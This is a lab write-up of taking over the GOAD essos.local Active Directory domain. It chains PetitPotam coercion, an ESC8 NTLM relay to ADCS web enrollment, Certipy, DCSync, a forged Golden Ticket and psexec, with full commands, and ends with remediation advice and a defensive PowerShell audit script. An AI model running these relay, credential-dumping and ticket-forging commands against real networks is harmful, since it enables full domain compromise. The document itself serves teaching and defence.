This walkthrough shows how a single unauthenticated coercion flaw turned into full domain compromise in the ESSOS GOAD domain. No creds. No phishing. Just bad defaults and missing protections.


Phase 1: Recon and Target Identification

A basic nmap sweep of the subnet surfaced two high value systems:

  • 10.3.10.12 (MEEREEN)
    Domain Controller for essos.local.
  • 10.3.10.23 (BRAAVOS)
    Exposed HTTP service. Identified as ADCS Web Enrollment.

Phase 2: Coercion via ESC8 and PetitPotam

BRAAVOS had ADCS Web Enrollment enabled over HTTP with no NTLM relay protections. That makes it vulnerable to ESC8.

Plan:

  1. Relay incoming NTLM auth to the ADCS endpoint.
  2. Coerce the Domain Controller into authenticating to me.
  3. Request a certificate for the DC machine account.

Relay Setup

impacket-ntlmrelayx \
  -t http://10.3.10.23/certsrv/certfnsh.asp \
  --adcs \
  --template DomainController

Trigger the Coercion

python3 PetitPotam.py 10.3.10.210 meereen.essos.local

Result:

  • MEEREEN$ authenticated to my Kali host.
  • NTLM was relayed to ADCS.
  • The CA issued a Domain Controller certificate.

Output artifact: MEEREEN.pfx.


Phase 3: Turning a Certificate into Domain Secrets

Certificates are useful. NT hashes are better.

Using Certipy, I authenticated with the PFX and extracted the DC machine account hash.

certipy-ad auth \
  -pfx MEEREEN.pfx \
  -dc-ip 10.3.10.12

Recovered hash:

MEEREEN$:38506151444e193264ea4339705cee86

With a DC machine hash, DCSync is trivial.

impacket-secretsdump \
  -hashes :38506151444e193264ea4339705cee86 \
  'essos.local/MEEREEN$@10.3.10.12'

Phase 4: Persistence via Golden Ticket

Using the krbtgt hash, I forged a Golden Ticket that asserts Domain Admin privileges and remains valid for years.

impacket-ticketer \
  -domain essos.local \
  -domain-sid S-1-5-21-2003082546-1317317289-410609582 \
  -nthash 8c000bd84915502355f775cf75de84d7 \
  Administrator

This ticket does not expire in any meaningful operational sense unless krbtgt is rotated twice.


Phase 5: SYSTEM Shell on the Domain Controller

Load the forged ticket and authenticate over Kerberos. No passwords required.

export KRB5CCNAME=Administrator.ccache
impacket-psexec essos.local/Administrator@meereen.essos.local -k -no-pass

Why This Worked

  • ADCS Web Enrollment exposed over HTTP.
  • NTLM relay protections not enforced.
  • Unauthenticated MS-EFSRPC reachable.
  • No SMB signing enforcement.
  • No EPA on ADCS endpoints.

Any single control would have broken the chain.


Remediation Guidance

For defenders and administrators:

  • Enforce SMB signing
    Prevents NTLM relay outright.
  • Harden ADCS
    Disable HTTP Web Enrollment.
    If required, enforce HTTPS, enable EPA, and restrict templates.
  • Block MS-EFSRPC coercion
    Filter or restrict unauthenticated access to the EFSRPC interface.
  • Audit ADCS usage
    Treat certificate services as Tier 0 infrastructure.
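An added example, not part of the original write-up: a PowerShell audit-and-remediate script that checks the controls listed under Why This Worked and in the guidance above, on the ADCS web enrollment host (BRAAVOS in this lab). It assumes the default enrollment application path 'Default Web Site/CertSrv', the IIS WebAdministration module, and that event 4887 messages on the CA carry 'Requester:' and 'CertificateTemplate:' fields; the two MS-EFSR interface UUIDs are the published ones, and that RPC filter belongs on the Domain Controller, not the CA. One caveat the list above glosses over: SMB signing blocks relay to SMB targets, while what stops the relay to the HTTP enrollment endpoint in this chain is HTTPS plus EPA.

```powershell
# Added example (not code from the original post). Run elevated. Without
# -Remediate it only reports; with -Remediate it applies the fixes.
param(
    [switch]$Remediate,
    [switch]$BlockEfsrpc,               # only meaningful on the DC
    [string]$Site = 'Default Web Site',  # assumption: default IIS site
    [string]$App  = 'CertSrv'            # assumption: default enrollment app
)
Import-Module WebAdministration -ErrorAction Stop

$findings = @()
$location = "$Site/$App"
$winAuth  = 'system.webServer/security/authentication/windowsAuthentication'

# Get-WebConfigurationProperty returns either a bare value or a
# ConfigurationAttribute; normalise to a string for comparison.
function Get-ConfigValue($Filter, $Name) {
    $v = Get-WebConfigurationProperty -PSPath 'IIS:\' -Location $location -Filter $Filter -Name $Name
    if ($v -is [string]) { return $v }
    if ($null -ne $v.Value) { return "$($v.Value)" }
    return "$v"
}

# 1. SMB signing: defeats relay to SMB targets on this host (not to HTTP).
if (-not (Get-SmbServerConfiguration).RequireSecuritySignature) {
    $findings += 'SMB signing is not required on this host'
    if ($Remediate) { Set-SmbServerConfiguration -RequireSecuritySignature $true -Force }
}

# 2. Extended Protection for Authentication on the enrollment app: binds the
#    NTLM handshake to the TLS channel, so a relayed handshake is rejected.
$epa = Get-ConfigValue "$winAuth/extendedProtection" 'tokenChecking'
if ($epa -notmatch 'Require') {
    $findings += "EPA tokenChecking is '$epa' on $location (want Require)"
    if ($Remediate) {
        Set-WebConfigurationProperty -PSPath 'IIS:\' -Location $location `
            -Filter "$winAuth/extendedProtection" -Name 'tokenChecking' -Value 'Require'
    }
}

# 3. Require TLS on the enrollment app; EPA has nothing to bind to over plain HTTP.
$ssl = Get-ConfigValue 'system.webServer/security/access' 'sslFlags'
if ($ssl -notmatch 'Ssl') {
    $findings += "TLS not required on $location (sslFlags='$ssl')"
    if ($Remediate) {
        Set-WebConfigurationProperty -PSPath 'IIS:\' -Location $location `
            -Filter 'system.webServer/security/access' -Name 'sslFlags' -Value 'Ssl'
    }
}

# 4. A plain HTTP binding on the site gives the relay a cleartext target; drop it.
if (Get-WebBinding -Name $Site -Protocol 'http') {
    $findings += "Site '$Site' still has an HTTP binding"
    if ($Remediate) { Remove-WebBinding -Name $Site -Protocol 'http' }
}

# 5. Audit: recent issuances from the DomainController template (event 4887
#    on the CA). The regexes assume the message layout described in the lead-in.
Get-WinEvent -FilterHashtable @{LogName = 'Security'; Id = 4887} -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'CertificateTemplate:DomainController' } |
    ForEach-Object {
        $req = if ($_.Message -match 'Requester:\s+(\S+)') { $Matches[1] } else { 'unknown' }
        $findings += "4887: DomainController certificate issued to $req at $($_.TimeCreated)"
    }

# 6. DC only: block the MS-EFSR interfaces at the RPC layer so unauthenticated
#    EFSRPC coercion cannot reach the service. Caveat: this also breaks
#    legitimate remote EFS use against this host.
if ($BlockEfsrpc) {
    foreach ($uuid in 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'df1941c5-fe89-4e79-bf10-463657acf44d') {
        netsh rpc filter add rule layer=um actiontype=block | Out-Null
        netsh rpc filter add condition field=if_uuid matchtype=equal data=$uuid | Out-Null
        netsh rpc filter add filter | Out-Null
    }
    $findings += 'RPC filter installed for the two MS-EFSR interface UUIDs'
}

if ($findings.Count -eq 0) { 'No findings: relay path to ADCS web enrollment is closed.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Run it first without switches to get a report, then with -Remediate on the CA host; run it with -BlockEfsrpc on the Domain Controller only after confirming nothing depends on remote EFS there. Items 2 through 4 are the ones that actually break the relay-to-HTTP step in this chain; item 1 closes the SMB variant, and item 5 gives you the audit trail that would have shown MEEREEN$ obtaining a DomainController certificate from a request that did not originate on MEEREEN.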